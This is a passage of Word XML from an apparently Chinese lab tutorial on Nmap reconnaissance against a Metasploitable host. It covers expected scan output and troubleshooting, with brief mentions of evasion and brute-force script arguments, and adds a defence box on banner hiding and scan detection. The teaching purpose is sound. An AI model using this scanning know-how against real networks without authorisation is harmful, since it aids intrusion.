        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②。执行此类脚本可能引起服务异常，务必确认隔离环境并做好快照。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象与结果判读</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主机发现阶段应能看到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主机响应，若不响应可能因防火墙禁</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ping，需增加其他发现选项（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-Pn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）或检查网络配置。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限下会快速完成，若使用非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用户，Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将自动回退到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> connect </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描（-sT），速度较慢且会在目标日志中留下完整连接记录。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本扫描输出中，端口号旁除了官方服务名外，还会附加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">(?)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表示不确定，或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">service: &lt;name&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表示自定义识别。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- OS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指纹输出通常包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Device type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> general </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">purpose）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（OS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">家族）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OS CPE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等字段，以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OS details</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">描述。理想情况下置信度百分比应大于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 90%。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- NSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本执行完毕后，输出会带有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|_</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">前缀，表示脚本输出的结束。若某脚本未产生输出，可能意味着它认为目标不适用或未发现有效信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">④ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见报错与排错</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：若执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时提示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">You requested a scan type which requires root privileges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，必须使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或切换到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root。原因是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描需构造原始套接字（raw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">socket）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防火墙过滤导致端口状态全部为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">filtered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：目标主机或网络中有防火墙拦截了探测包。可尝试使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-Pn</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跳过主机发现直接进行端口扫描，或结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--reason</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看每个端口状态的判定原因。若依然全是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">filtered，可能需要进行源端口欺骗、分片等规避（但分片扫描可能被防火墙丢弃，且属于检测规避，此处不展开）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">版本扫描速度非常慢</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--version-intensity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，默认强度</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会发送大量探针。可降低到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以加速，但可能降低识别率。使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--max-retries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">限制重试次数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--host-timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设置单个主机超时也能提升速度。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">指纹无法识别</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：可能因为目标没有至少一个开放和一个关闭的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口，或者缺少必要的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口。可尝试先进行全连接扫描确保关闭端口存在，或者使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--osscan-limit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">限制只在理想条件下开启</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测，避免无效尝试。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">脚本卡住或失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：某些脚本可能依赖特定服务版本，或需要额外参数。可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--script-trace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">追踪脚本执行过程定位问题；使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--script-args</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">传递必要参数（如暴力破解的用户名字典）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框（强制）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队可采取多层措施抵御信息泄露与侦察：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">服务信息隐藏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：配置服务软件使用自定义</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">banner，或禁用版本字符串暴露。例如修改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OpenSSH </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sshd_config</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Banner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DebianBanner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选项；Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ServerTokens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指令减少信息输出，或使用反向代理重写响应头。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">操作系统指纹混淆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：通过防火墙或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDS/IPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">插件（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">frag3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">snort</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">osfuscate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）对出站数据包的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选项进行标准化或随机化，使得指纹不稳定；也可在敏感网络边界部署代理，将内部主机的真实协议栈隐藏起来。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">扫描检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：监测短时间内向多个端口发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包、SYN-ACK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">回应</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等模式。Snort</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GPL SCAN nmap -sS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可识别</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描；Suricata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">也有类似签名。可将这些告警与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">联动，自动封禁源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一段时间。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">速率限制与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SYN cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在状态防火墙或主机上启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">机制可以消耗攻击者资源同时保护自身连接表；防火墙可设置对单个源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的连接速率每秒上限，超过则丢弃或延迟，使扫描变慢，增加攻击成本。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
